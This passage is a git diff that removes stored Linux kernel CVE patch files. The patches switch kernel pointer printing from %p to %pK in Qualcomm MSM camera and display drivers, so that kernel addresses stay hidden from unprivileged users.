-@@ -795,7 +795,7 @@ static int msm_eeprom_i2c_probe(struct i2c_client *client,
- }
- e_ctrl->eeprom_v4l2_subdev_ops = &msm_eeprom_subdev_ops;
- e_ctrl->eeprom_mutex = &msm_eeprom_mutex;
-- CDBG("%s client = 0x%p\n", __func__, client);
-+ CDBG("%s client = 0x%pK\n", __func__, client);
- e_ctrl->eboard_info = (struct msm_eeprom_board_info *)(id->driver_data);
- if (!e_ctrl->eboard_info) {
- pr_err("%s:%d board info NULL\n", __func__, __LINE__);
-@@ -1521,7 +1521,7 @@ static long msm_eeprom_subdev_ioctl32(struct v4l2_subdev *sd,
- void __user *argp = (void __user *)arg;
-
- CDBG("%s E\n", __func__);
-- CDBG("%s:%d a_ctrl %p argp %p\n", __func__, __LINE__, e_ctrl, argp);
-+ CDBG("%s:%d a_ctrl %pK argp %pK\n", __func__, __LINE__, e_ctrl, argp);
- switch (cmd) {
- case VIDIOC_MSM_SENSOR_GET_SUBDEV_ID:
- return msm_eeprom_get_subdev_id(e_ctrl, argp);
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-index 86d61e7..84bd3fe 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-@@ -347,7 +347,7 @@ static int32_t msm_flash_i2c_release(
- int32_t rc = 0;
-
- if (!(&flash_ctrl->power_info) || !(&flash_ctrl->flash_i2c_client)) {
-- pr_err("%s:%d failed: %p %p\n",
-+ pr_err("%s:%d failed: %pK %pK\n",
- __func__, __LINE__, &flash_ctrl->power_info,
- &flash_ctrl->flash_i2c_client);
- return -EINVAL;
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_dt_util.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_dt_util.c
-index af47235..6b867bf 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_dt_util.c
-+++ 
b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_dt_util.c
-@@ -34,7 +34,7 @@ int msm_camera_fill_vreg_params(struct camera_vreg_t *cam_vreg,
-
- /* Validate input parameters */
- if (!cam_vreg || !power_setting) {
-- pr_err("%s:%d failed: cam_vreg %p power_setting %p", __func__,
-+ pr_err("%s:%d failed: cam_vreg %pK power_setting %pK", __func__,
- __LINE__, cam_vreg, power_setting);
- return -EINVAL;
- }
-@@ -1327,7 +1327,7 @@ int msm_camera_power_up(struct msm_camera_power_ctrl_t *ctrl,
-
- CDBG("%s:%d\n", __func__, __LINE__);
- if (!ctrl || !sensor_i2c_client) {
-- pr_err("failed ctrl %p sensor_i2c_client %p\n", ctrl,
-+ pr_err("failed ctrl %pK sensor_i2c_client %pK\n", ctrl,
- sensor_i2c_client);
- return -EINVAL;
- }
-@@ -1549,7 +1549,7 @@ int msm_camera_power_down(struct msm_camera_power_ctrl_t *ctrl,
-
- CDBG("%s:%d\n", __func__, __LINE__);
- if (!ctrl || !sensor_i2c_client) {
-- pr_err("failed ctrl %p sensor_i2c_client %p\n", ctrl,
-+ pr_err("failed ctrl %pK sensor_i2c_client %pK\n", ctrl,
- sensor_i2c_client);
- return -EINVAL;
- }
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor.c b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor.c
-index 6a4dcdc..d09e29d 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor.c
-@@ -106,7 +106,7 @@ int msm_sensor_power_down(struct msm_sensor_ctrl_t *s_ctrl)
- struct msm_camera_i2c_client *sensor_i2c_client;
-
- if (!s_ctrl) {
-- pr_err("%s:%d failed: s_ctrl %p\n",
-+ pr_err("%s:%d failed: s_ctrl %pK\n",
- __func__, __LINE__, s_ctrl);
- return -EINVAL;
- }
-@@ -119,7 +119,7 @@ int msm_sensor_power_down(struct msm_sensor_ctrl_t *s_ctrl)
- sensor_i2c_client = s_ctrl->sensor_i2c_client;
-
- if (!power_info || !sensor_i2c_client) {
-- pr_err("%s:%d failed: power_info %p sensor_i2c_client %p\n",
-+ pr_err("%s:%d failed: power_info %pK sensor_i2c_client %pK\n",
- __func__, __LINE__, power_info, sensor_i2c_client); 
- return -EINVAL;
- }
-@@ -137,7 +137,7 @@ int msm_sensor_power_up(struct msm_sensor_ctrl_t *s_ctrl)
- uint32_t retry = 0;
-
- if (!s_ctrl) {
-- pr_err("%s:%d failed: %p\n",
-+ pr_err("%s:%d failed: %pK\n",
- __func__, __LINE__, s_ctrl);
- return -EINVAL;
- }
-@@ -152,7 +152,7 @@ int msm_sensor_power_up(struct msm_sensor_ctrl_t *s_ctrl)
-
- if (!power_info || !sensor_i2c_client || !slave_info ||
- !sensor_name) {
-- pr_err("%s:%d failed: %p %p %p %p\n",
-+ pr_err("%s:%d failed: %pK %pK %pK %pK\n",
- __func__, __LINE__, power_info,
- sensor_i2c_client, slave_info, sensor_name);
- return -EINVAL;
-@@ -208,7 +208,7 @@ int msm_sensor_match_id(struct msm_sensor_ctrl_t *s_ctrl)
- const char *sensor_name;
-
- if (!s_ctrl) {
-- pr_err("%s:%d failed: %p\n",
-+ pr_err("%s:%d failed: %pK\n",
- __func__, __LINE__, s_ctrl);
- return -EINVAL;
- }
-@@ -217,7 +217,7 @@ int msm_sensor_match_id(struct msm_sensor_ctrl_t *s_ctrl)
- sensor_name = s_ctrl->sensordata->sensor_name;
-
- if (!sensor_i2c_client || !slave_info || !sensor_name) {
-- pr_err("%s:%d failed: %p %p %p\n",
-+ pr_err("%s:%d failed: %pK %pK %pK\n",
- __func__, __LINE__, sensor_i2c_client, slave_info,
- sensor_name);
- return -EINVAL;
-@@ -1450,13 +1450,13 @@ int32_t msm_sensor_init_default_params(struct msm_sensor_ctrl_t *s_ctrl)
-
- /* Validate input parameters */
- if (!s_ctrl) {
-- pr_err("%s:%d failed: invalid params s_ctrl %p\n", __func__,
-+ pr_err("%s:%d failed: invalid params s_ctrl %pK\n", __func__,
- __LINE__, s_ctrl);
- return -EINVAL;
- }
-
- if (!s_ctrl->sensor_i2c_client) {
-- pr_err("%s:%d failed: invalid params sensor_i2c_client %p\n",
-+ pr_err("%s:%d failed: invalid params sensor_i2c_client %pK\n",
- __func__, __LINE__, s_ctrl->sensor_i2c_client);
- return -EINVAL;
- }
-@@ -1465,7 +1465,7 @@ int32_t msm_sensor_init_default_params(struct msm_sensor_ctrl_t *s_ctrl)
- s_ctrl->sensor_i2c_client->cci_client = kzalloc(sizeof(
- struct msm_camera_cci_client), GFP_KERNEL);
- if
(!s_ctrl->sensor_i2c_client->cci_client) {
-- pr_err("%s:%d failed: no memory cci_client %p\n", __func__,
-+ pr_err("%s:%d failed: no memory cci_client %pK\n", __func__,
- __LINE__, s_ctrl->sensor_i2c_client->cci_client);
- return -ENOMEM;
- }
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c
-index 36ad847..d075a6d 100644
----- a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c
-@@ -474,10 +474,8 @@ static int32_t msm_sensor_get_power_down_settings(void *setting,
- }
- /* Allocate memory for power down setting */
- pd = kzalloc(sizeof(*pd) * size_down, GFP_KERNEL);
-- if (!pd) {
-- pr_err("failed: no memory power_setting %p", pd);
-+ if (!pd)
- return -EFAULT;
-- }
-
- if (slave_info->power_setting_array.power_down_setting) {
- #ifdef CONFIG_COMPAT
-@@ -541,10 +539,8 @@ static int32_t msm_sensor_get_power_up_settings(void *setting,
-
- /* Allocate memory for power up setting */
- pu = kzalloc(sizeof(*pu) * size, GFP_KERNEL);
-- if (!pu) {
-- pr_err("failed: no memory power_setting %p", pu);
-+ if (!pu)
- return -ENOMEM;
-- }
-
- #ifdef CONFIG_COMPAT
- if (is_compat_task()) {
-@@ -655,22 +651,20 @@ int32_t msm_sensor_driver_probe(void *setting,
-
- /* Validate input parameters */
- if (!setting) {
-- pr_err("failed: slave_info %p", setting);
-+ pr_err("failed: slave_info %pK", setting);
- return -EINVAL;
- }
-
- /* Allocate memory for slave info */
- slave_info = kzalloc(sizeof(*slave_info), GFP_KERNEL);
-- if (!slave_info) {
-- pr_err("failed: no memory slave_info %p", slave_info);
-+ if (!slave_info)
- return -ENOMEM;
-- }
- #ifdef CONFIG_COMPAT
- if (is_compat_task()) {
- struct msm_camera_sensor_slave_info32 *slave_info32 =
- kzalloc(sizeof(*slave_info32), GFP_KERNEL);
- if (!slave_info32) {
-- pr_err("failed: no memory for slave_info32 %p\n",
-+ pr_err("failed: no memory for
slave_info32 %pK\n",
- slave_info32);
- rc = -ENOMEM;
- goto free_slave_info;
-@@ -765,13 +759,13 @@ int32_t msm_sensor_driver_probe(void *setting,
- /* Extract s_ctrl from camera id */
- s_ctrl = g_sctrl[slave_info->camera_id];
- if (!s_ctrl) {
-- pr_err("failed: s_ctrl %p for camera_id %d", s_ctrl,
-+ pr_err("failed: s_ctrl %pK for camera_id %d", s_ctrl,
- slave_info->camera_id);
- rc = -EINVAL;
- goto free_slave_info;
- }
-
-- CDBG("s_ctrl[%d] %p", slave_info->camera_id, s_ctrl);
-+ CDBG("s_ctrl[%d] %pK", slave_info->camera_id, s_ctrl);
-
- if (s_ctrl->is_probe_succeed == 1) {
- /*
-@@ -811,12 +805,9 @@ int32_t msm_sensor_driver_probe(void *setting,
-
-
- camera_info = kzalloc(sizeof(struct msm_camera_slave_info), GFP_KERNEL);
-- if (!camera_info) {
-- pr_err("failed: no memory slave_info %p", camera_info);
-+ if (!camera_info)
- goto free_slave_info;
-
-- }
--
- s_ctrl->sensordata->slave_info = camera_info;
-
- /* Fill sensor slave info */
-@@ -828,7 +819,7 @@ int32_t msm_sensor_driver_probe(void *setting,
-
- /* Fill CCI master, slave address and CCI default params */
- if (!s_ctrl->sensor_i2c_client) {
-- pr_err("failed: sensor_i2c_client %p",
-+ pr_err("failed: sensor_i2c_client %pK",
- s_ctrl->sensor_i2c_client);
- rc = -EINVAL;
- goto free_camera_info;
-@@ -841,7 +832,7 @@ int32_t msm_sensor_driver_probe(void *setting,
-
- cci_client = s_ctrl->sensor_i2c_client->cci_client;
- if (!cci_client) {
-- pr_err("failed: cci_client %p", cci_client);
-+ pr_err("failed: cci_client %pK", cci_client);
- goto free_camera_info;
- }
- cci_client->cci_i2c_master = s_ctrl->cci_i2c_master;
-@@ -1129,7 +1120,7 @@ static int32_t msm_sensor_driver_parse(struct msm_sensor_ctrl_t *s_ctrl)
- s_ctrl->sensor_i2c_client = kzalloc(sizeof(*s_ctrl->sensor_i2c_client),
- GFP_KERNEL);
- if (!s_ctrl->sensor_i2c_client) {
-- pr_err("failed: no memory sensor_i2c_client %p",
-+ pr_err("failed: no memory sensor_i2c_client %pK",
- s_ctrl->sensor_i2c_client);
- return -ENOMEM;
- }
-@@ -1138,7
+1129,7 @@ static int32_t msm_sensor_driver_parse(struct msm_sensor_ctrl_t *s_ctrl)
- s_ctrl->msm_sensor_mutex = kzalloc(sizeof(*s_ctrl->msm_sensor_mutex),
- GFP_KERNEL);
- if (!s_ctrl->msm_sensor_mutex) {
-- pr_err("failed: no memory msm_sensor_mutex %p",
-+ pr_err("failed: no memory msm_sensor_mutex %pK",
- s_ctrl->msm_sensor_mutex);
- goto FREE_SENSOR_I2C_CLIENT;
- }
-@@ -1167,7 +1158,7 @@ static int32_t msm_sensor_driver_parse(struct msm_sensor_ctrl_t *s_ctrl)
-
- /* Store sensor control structure in static database */
- g_sctrl[s_ctrl->id] = s_ctrl;
-- CDBG("g_sctrl[%d] %p", s_ctrl->id, g_sctrl[s_ctrl->id]);
-+ CDBG("g_sctrl[%d] %pK", s_ctrl->id, g_sctrl[s_ctrl->id]);
-
- return rc;
-
-@@ -1191,10 +1182,8 @@ static int32_t msm_sensor_driver_platform_probe(struct platform_device *pdev)
-
- /* Create sensor control structure */
- s_ctrl = kzalloc(sizeof(*s_ctrl), GFP_KERNEL);
-- if (!s_ctrl) {
-- pr_err("failed: no memory s_ctrl %p", s_ctrl);
-+ if (!s_ctrl)
- return -ENOMEM;
-- }
-
- platform_set_drvdata(pdev, s_ctrl);
-
-@@ -1238,10 +1227,8 @@ static int32_t msm_sensor_driver_i2c_probe(struct i2c_client *client,
-
- /* Create sensor control structure */
- s_ctrl = kzalloc(sizeof(*s_ctrl), GFP_KERNEL);
-- if (!s_ctrl) {
-- pr_err("failed: no memory s_ctrl %p", s_ctrl);
-+ if (!s_ctrl)
- return -ENOMEM;
-- }
-
- i2c_set_clientdata(client, s_ctrl);
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_init.c b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_init.c
-index 8b6e3d3..ed0b974 100644
----- a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_init.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_init.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -64,7 +64,7 @@ static int32_t msm_sensor_driver_cmd(struct msm_sensor_init_t *s_init,
-
- /* Validate input parameters */
- if (!s_init || !cfg) {
-- pr_err("failed: s_init %p cfg %p", s_init, cfg);
-+ pr_err("failed: s_init %pK cfg %pK", s_init, cfg);
- return -EINVAL;
- }
-
-@@ -106,7 +106,7 @@ static long msm_sensor_init_subdev_ioctl(struct v4l2_subdev *sd,
-
- /* Validate input parameters */
- if (!s_init) {
-- pr_err("failed: s_init %p", s_init);
-+ pr_err("failed: s_init %pK", s_init);
- return -EINVAL;
- }
-
-@@ -167,12 +167,10 @@ static int __init msm_sensor_init_module(void)
- int ret = 0;
- /* Allocate memory for msm_sensor_init control structure */
- s_init = kzalloc(sizeof(struct msm_sensor_init_t), GFP_KERNEL);
-- if (!s_init) {
-- pr_err("failed: no memory s_init %p", NULL);
-+ if (!s_init)
- return -ENOMEM;
-- }
-
-- CDBG("MSM_SENSOR_INIT_MODULE %p", NULL);
-+ CDBG("MSM_SENSOR_INIT_MODULE %pK", NULL);
-
- /* Initialize mutex */
- mutex_init(&s_init->imutex);
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/ois/msm_ois.c b/drivers/media/platform/msm/camera_v2/sensor/ois/msm_ois.c
-index 947eeaf..82c9e5c5 100644
----- a/drivers/media/platform/msm/camera_v2/sensor/ois/msm_ois.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/ois/msm_ois.c
-@@ -448,7 +448,7 @@ static long msm_ois_subdev_ioctl(struct v4l2_subdev *sd,
- struct msm_ois_ctrl_t *o_ctrl = v4l2_get_subdevdata(sd);
- void __user *argp = (void __user *)arg;
- CDBG("Enter\n");
-- CDBG("%s:%d o_ctrl %p argp %p\n", __func__, __LINE__, o_ctrl, argp);
-+ CDBG("%s:%d o_ctrl %pK argp %pK\n", __func__, __LINE__, o_ctrl, argp);
- switch (cmd) {
- case VIDIOC_MSM_SENSOR_GET_SUBDEV_ID:
- return msm_ois_get_subdev_id(o_ctrl, argp);
-@@ -553,7 +553,7 @@ static int32_t msm_ois_i2c_probe(struct i2c_client *client,
- goto probe_failure;
- }
-
--
CDBG("client = 0x%p\n", client);
-+ CDBG("client = 0x%pK\n", client);
-
- rc = of_property_read_u32(client->dev.of_node, "cell-index",
- &ois_ctrl_t->subdev_id);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6757/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-6757/3.10/0001.patch
deleted file mode 100644
index c6534b4b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6757/3.10/0001.patch
+++ /dev/null
@@ -1,683 +0,0 @@
-From cd99d3bbdb16899a425716e672485e0cdc283245 Mon Sep 17 00:00:00 2001
-From: Abhijit Kulkarni
-Date: Wed, 15 Jun 2016 10:30:50 -0700
-Subject: msm: mdss: hide kernel addresses from unprevileged users
-
-for printing kernel pointers which should be hidden from unprivileged
-users, use %pK which evaluates whether kptr_restrict is set.
-
-CRs-Fixed: 987021
-Change-Id: Ie49eee9478f4657cfb2a994ba60da1ec4c356339
-Signed-off-by: Abhijit Kulkarni
-Signed-off-by: Nirmal Abraham
----
- drivers/video/msm/mdss/mdp3.c | 16 ++++++++--------
- drivers/video/msm/mdss/mdp3_ppp_hwio.c | 8 +++++---
- drivers/video/msm/mdss/mdss_debug.c | 8 ++++----
- drivers/video/msm/mdss/mdss_dsi.c | 14 +++++++-------
- drivers/video/msm/mdss/mdss_dsi_host.c | 2 +-
- drivers/video/msm/mdss/mdss_dsi_panel.c | 12 ++++++------
- drivers/video/msm/mdss/mdss_fb.c | 6 +++---
- drivers/video/msm/mdss/mdss_hdmi_tx.c | 6 +++---
- drivers/video/msm/mdss/mdss_hdmi_util.c | 4 ++--
- drivers/video/msm/mdss/mdss_mdp.c | 4 ++--
- drivers/video/msm/mdss/mdss_mdp_debug.c | 6 +++---
- drivers/video/msm/mdss/mdss_mdp_intf_cmd.c | 6 +++---
- drivers/video/msm/mdss/mdss_mdp_intf_video.c | 6 +++---
- drivers/video/msm/mdss/mdss_mdp_pipe.c | 2 +-
- drivers/video/msm/mdss/mdss_mdp_pp.c | 14 +++++++-------
- drivers/video/msm/mdss/mdss_mdp_util.c | 8 ++++----
- drivers/video/msm/mdss/mdss_mdp_wb.c | 10 +++++-----
- drivers/video/msm/mdss/mdss_util.c | 5 ++---
- 18 files changed, 69 insertions(+), 68 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdp3.c b/drivers/video/msm/mdss/mdp3.c
-index 2a9c915..521eb7e 100644
----- a/drivers/video/msm/mdss/mdp3.c
-+++ b/drivers/video/msm/mdss/mdp3.c
-@@ -1096,7 +1096,7 @@ static int mdp3_res_init(void)
-
- mdp3_res->ion_client = msm_ion_client_create(mdp3_res->pdev->name);
- if (IS_ERR_OR_NULL(mdp3_res->ion_client)) {
-- pr_err("msm_ion_client_create() return error (%p)\n",
-+ pr_err("msm_ion_client_create() return error (%pK)\n",
- mdp3_res->ion_client);
-
mdp3_res->ion_client = NULL;
- return -EINVAL;
-@@ -1528,7 +1528,7 @@ void mdp3_unmap_iommu(struct ion_client *client, struct ion_handle *handle)
- mutex_lock(&mdp3_res->iommu_lock);
- meta = mdp3_iommu_meta_lookup(table);
- if (!meta) {
-- WARN(1, "%s: buffer was never mapped for %p\n", __func__,
-+ WARN(1, "%s: buffer was never mapped for %pK\n", __func__,
- handle);
- mutex_unlock(&mdp3_res->iommu_lock);
- goto out;
-@@ -1556,7 +1556,7 @@ static void mdp3_iommu_meta_add(struct mdp3_iommu_meta *meta)
- } else if (meta->table > entry->table) {
- p = &(*p)->rb_right;
- } else {
-- pr_err("%s: handle %p already exists\n", __func__,
-+ pr_err("%s: handle %pK already exists\n", __func__,
- entry->handle);
- BUG();
- }
-@@ -1618,7 +1618,7 @@ static int mdp3_iommu_map_iommu(struct mdp3_iommu_meta *meta,
- ret = iommu_map_range(domain, meta->iova_addr + padding,
- table->sgl, size, prot);
- if (ret) {
-- pr_err("%s: could not map %pa in domain %p\n",
-+ pr_err("%s: could not map %pa in domain %pK\n",
- __func__, &meta->iova_addr, domain);
- unmap_size = padding;
- goto out2;
-@@ -1741,12 +1741,12 @@ int mdp3_self_map_iommu(struct ion_client *client, struct ion_handle *handle,
- }
- } else {
- if (iommu_meta->flags != iommu_flags) {
-- pr_err("%s: handle %p is already mapped with diff flag\n",
-+ pr_err("%s: handle %pK is already mapped with diff flag\n",
- __func__, handle);
- ret = -EINVAL;
- goto out_unlock;
- } else if (iommu_meta->mapped_size != iova_length) {
-- pr_err("%s: handle %p is already mapped with diff len\n",
-+ pr_err("%s: handle %pK is already mapped with diff len\n",
- __func__, handle);
- ret = -EINVAL;
- goto out_unlock;
-@@ -1868,7 +1868,7 @@ done:
- data->addr += img->offset;
- data->len -= img->offset;
-
-- pr_debug("mem=%d ihdl=%p buf=0x%pa len=0x%x\n", img->memory_id,
-+ pr_debug("mem=%d ihdl=%pK buf=0x%pa len=0x%x\n", img->memory_id,
- data->srcp_ihdl, &data->addr, data->len);
- } else {
- mdp3_put_img(data, client);
-@@ -2101,7 +2101,7 @@
static int mdp3_alloc(struct msm_fb_data_type *mfd)
- return ret;
- }
-
-- pr_info("allocating %u bytes at %p (%lx phys) for fb %d\n",
-+ pr_info("allocating %u bytes at %pK (%lx phys) for fb %d\n",
- size, virt, phys, mfd->index);
-
- mfd->fbi->screen_base = virt;
-diff --git a/drivers/video/msm/mdss/mdp3_ppp_hwio.c b/drivers/video/msm/mdss/mdp3_ppp_hwio.c
-index d8c4168..4317726 100644
----- a/drivers/video/msm/mdss/mdp3_ppp_hwio.c
-+++ b/drivers/video/msm/mdss/mdp3_ppp_hwio.c
-@@ -1291,7 +1291,8 @@ int config_ppp_op_mode(struct ppp_blit_op *blit_op)
- bg_mdp_ops = 0;
- }
- pr_debug("BLIT FG Param Fmt %d (x %d,y %d,w %d,h %d), ROI(x %d,y %d, w\
-- %d, h %d) Addr_P0 %p, Stride S0 %d Addr_P1 %p, Stride S1 %d\n",
-+ %d, h %d) Addr_P0 %pK, Stride S0 %d Addr_P1 %pK,\
-+ Stride S1 %d\n",
- blit_op->src.color_fmt, blit_op->src.prop.x, blit_op->src.prop.y,
- blit_op->src.prop.width, blit_op->src.prop.height,
- blit_op->src.roi.x, blit_op->src.roi.y, blit_op->src.roi.width,
-@@ -1299,14 +1300,15 @@ int config_ppp_op_mode(struct ppp_blit_op *blit_op)
- blit_op->src.p1, blit_op->src.stride1);
- if (blit_op->bg.p0 != blit_op->dst.p0)
- pr_debug("BLIT BG Param Fmt %d (x %d,y %d,w %d,h %d), ROI(x %d,y %d, w\
-- %d, h %d) Addr %p, Stride S0 %d Addr_P1 %p, Stride S1 %d\n",
-+ %d, h %d) Addr %pK, Stride S0 %d Addr_P1 %pK,\
-+ Stride S1 %d\n",
- blit_op->bg.color_fmt, blit_op->bg.prop.x, blit_op->bg.prop.y,
- blit_op->bg.prop.width, blit_op->bg.prop.height,
- blit_op->bg.roi.x, blit_op->bg.roi.y, blit_op->bg.roi.width,
- blit_op->bg.roi.height, blit_op->bg.p0, blit_op->bg.stride0,
- blit_op->bg.p1, blit_op->bg.stride1);
- pr_debug("BLIT FB Param Fmt %d (x %d,y %d,w %d,h %d), ROI(x %d,y %d, w\
-- %d, h %d) Addr %p, Stride S0 %d Addr_P1 %p, Stride S1 %d\n",
-+ %d, h %d) Addr %pK, Stride S0 %d Addr_P1 %pK, Stride S1 %d\n",
- blit_op->dst.color_fmt, blit_op->dst.prop.x, blit_op->dst.prop.y,
- blit_op->dst.prop.width, blit_op->dst.prop.height,
- blit_op->dst.roi.x, blit_op->dst.roi.y,
blit_op->dst.roi.width,
-diff --git a/drivers/video/msm/mdss/mdss_debug.c b/drivers/video/msm/mdss/mdss_debug.c
-index 3513540..15d7dea 100644
----- a/drivers/video/msm/mdss/mdss_debug.c
-+++ b/drivers/video/msm/mdss/mdss_debug.c
-@@ -178,7 +178,7 @@ static ssize_t panel_debug_base_reg_write(struct file *file,
- for (i = 0; i < len; i++) {
- p = buf + i * 3;
- p[2] = 0;
-- pr_debug("p[%d] = %p:%s\n", i, p, p);
-+ pr_debug("p[%d] = %pK:%s\n", i, p, p);
- cnt = sscanf(p, "%x", &tmp);
- reg[i] = tmp;
- pr_debug("reg[%d] = %x\n", i, (int)reg[i]);
-@@ -1072,7 +1072,7 @@ void mdss_dump_reg(char __iomem *base, int len)
- x4 = readl_relaxed(addr+0x4);
- x8 = readl_relaxed(addr+0x8);
- xc = readl_relaxed(addr+0xc);
-- pr_info("%p : %08x %08x %08x %08x\n", addr, x0, x4, x8, xc);
-+ pr_info("%pK : %08x %08x %08x %08x\n", addr, x0, x4, x8, xc);
- addr += 16;
- }
- mdss_mdp_clk_ctrl(MDP_BLOCK_POWER_OFF);
-@@ -1192,7 +1192,7 @@ static inline struct mdss_mdp_misr_map *mdss_misr_get_map(u32 block_id,
- return NULL;
- }
-
-- pr_debug("MISR Module(%d) CTRL(0x%x) SIG(0x%x) intf_base(0x%p)\n",
-+ pr_debug("MISR Module(%d) CTRL(0x%x) SIG(0x%x) intf_base(0x%pK)\n",
- block_id, map->ctrl_reg, map->value_reg, intf_base);
- return map;
- }
-@@ -1235,7 +1235,7 @@ int mdss_misr_set(struct mdss_data_type *mdata,
- bool use_mdp_up_misr = false;
-
- if (!mdata || !req || !ctl) {
-- pr_err("Invalid input params: mdata = %p req = %p ctl = %p",
-+ pr_err("Invalid input params: mdata = %pK req = %pK ctl = %pK",
- mdata, req, ctl);
- return -EINVAL;
- }
-diff --git a/drivers/video/msm/mdss/mdss_dsi.c b/drivers/video/msm/mdss/mdss_dsi.c
-index 9d12dfb..62c6f12 100644
----- a/drivers/video/msm/mdss/mdss_dsi.c
-+++ b/drivers/video/msm/mdss/mdss_dsi.c
-@@ -471,7 +471,7 @@ static int mdss_dsi_off(struct mdss_panel_data *pdata, int power_state)
-
- panel_info = &ctrl_pdata->panel_data.panel_info;
-
-- pr_debug("%s+: ctrl=%p ndx=%d power_state=%d\n",
-+ pr_debug("%s+: ctrl=%pK ndx=%d power_state=%d\n",
-
__func__, ctrl_pdata, ctrl_pdata->ndx, power_state);
-
- if (power_state == panel_info->panel_power_state) {
-@@ -559,7 +559,7 @@ int mdss_dsi_on(struct mdss_panel_data *pdata)
- panel_data);
-
- cur_power_state = pdata->panel_info.panel_power_state;
-- pr_debug("%s+: ctrl=%p ndx=%d cur_power_state=%d\n", __func__,
-+ pr_debug("%s+: ctrl=%pK ndx=%d cur_power_state=%d\n", __func__,
- ctrl_pdata, ctrl_pdata->ndx, cur_power_state);
-
- pinfo = &pdata->panel_info;
-@@ -703,7 +703,7 @@ static int mdss_dsi_unblank(struct mdss_panel_data *pdata)
- panel_data);
- mipi = &pdata->panel_info.mipi;
-
-- pr_debug("%s+: ctrl=%p ndx=%d cur_blank_state=%d\n", __func__,
-+ pr_debug("%s+: ctrl=%pK ndx=%d cur_blank_state=%d\n", __func__,
- ctrl_pdata, ctrl_pdata->ndx, pdata->panel_info.blank_state);
-
- mdss_dsi_clk_ctrl(ctrl_pdata, DSI_ALL_CLKS, 1);
-@@ -756,7 +756,7 @@ static int mdss_dsi_blank(struct mdss_panel_data *pdata, int power_state)
- panel_data);
- mipi = &pdata->panel_info.mipi;
-
-- pr_debug("%s+: ctrl=%p ndx=%d power_state=%d\n",
-+ pr_debug("%s+: ctrl=%pK ndx=%d power_state=%d\n",
- __func__, ctrl_pdata, ctrl_pdata->ndx, power_state);
-
- mdss_dsi_clk_ctrl(ctrl_pdata, DSI_ALL_CLKS, 1);
-@@ -826,7 +826,7 @@ static int mdss_dsi_post_panel_on(struct mdss_panel_data *pdata)
- ctrl_pdata = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- panel_data);
-
-- pr_debug("%s+: ctrl=%p ndx=%d\n", __func__,
-+ pr_debug("%s+: ctrl=%pK ndx=%d\n", __func__,
- ctrl_pdata, ctrl_pdata->ndx);
-
- mdss_dsi_clk_ctrl(ctrl_pdata, DSI_ALL_CLKS, 1);
-@@ -858,7 +858,7 @@ int mdss_dsi_cont_splash_on(struct mdss_panel_data *pdata)
- ctrl_pdata = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- panel_data);
-
-- pr_debug("%s+: ctrl=%p ndx=%d\n", __func__,
-+ pr_debug("%s+: ctrl=%pK ndx=%d\n", __func__,
- ctrl_pdata, ctrl_pdata->ndx);
-
- WARN((ctrl_pdata->ctrl_state & CTRL_STATE_PANEL_INIT),
-@@ -1700,7 +1700,7 @@ int mdss_dsi_retrieve_ctrl_resources(struct platform_device *pdev, int mode,
-
return rc;
- }
-
-- pr_info("%s: ctrl_base=%p ctrl_size=%x phy_base=%p phy_size=%x\n",
-+ pr_info("%s: ctrl_base=%pK ctrl_size=%x phy_base=%pK phy_size=%x\n",
- __func__, ctrl->ctrl_base, ctrl->reg_size, ctrl->phy_io.base,
- ctrl->phy_io.len);
-
-diff --git a/drivers/video/msm/mdss/mdss_dsi_host.c b/drivers/video/msm/mdss/mdss_dsi_host.c
-index ace2895..762cb55 100644
----- a/drivers/video/msm/mdss/mdss_dsi_host.c
-+++ b/drivers/video/msm/mdss/mdss_dsi_host.c
-@@ -97,7 +97,7 @@ void mdss_dsi_ctrl_init(struct device *ctrl_dev,
- if (ctrl->mdss_util->register_irq(ctrl->dsi_hw))
- pr_err("%s: mdss_register_irq failed.\n", __func__);
-
-- pr_debug("%s: ndx=%d base=%p\n", __func__, ctrl->ndx, ctrl->ctrl_base);
-+ pr_debug("%s: ndx=%d base=%pK\n", __func__, ctrl->ndx, ctrl->ctrl_base);
-
- init_completion(&ctrl->dma_comp);
- init_completion(&ctrl->mdp_comp);
-diff --git a/drivers/video/msm/mdss/mdss_dsi_panel.c b/drivers/video/msm/mdss/mdss_dsi_panel.c
-index 8c57c9b..b168769 100644
----- a/drivers/video/msm/mdss/mdss_dsi_panel.c
-+++ b/drivers/video/msm/mdss/mdss_dsi_panel.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
